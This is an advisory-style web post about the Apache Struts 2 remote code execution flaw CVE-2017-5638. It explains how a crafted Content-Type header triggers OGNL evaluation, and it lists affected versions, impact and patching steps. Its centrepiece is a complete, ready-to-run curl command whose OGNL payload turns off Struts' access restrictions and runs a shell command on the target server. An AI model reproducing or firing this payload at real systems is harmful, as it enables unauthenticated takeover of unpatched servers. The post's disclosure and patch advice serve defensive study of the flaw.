Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw originating from flawed error handling in the framework’s Jakarta Multipart parser. The exploit is triggered when a malicious Content-Type header is sent within an HTTP request to a Struts-based application. If the header value is abnormally constructed, the framework attempts to generate an error message. However, it incorrectly uses the user-supplied Content-Type value within a Freemarker interpolation. This interpolation process evaluates any Object-Graph Navigation Language (OGNL) expressions contained within the malicious header. Since OGNL expressions can execute arbitrary Java code on the server, an attacker can leverage this flawed error handling mechanism to achieve full system command execution with the privileges of the Struts application server, without requiring any form of authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Malicious HTTP Request

OGNL Expression Injection

Arbitrary Command Execution

Protection from this CVE

Immediate Patch Application

Upgrade Struts Version

Input Validation Filtering

Impact:

Full Server Compromise

Data Theft

Service Disruption

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top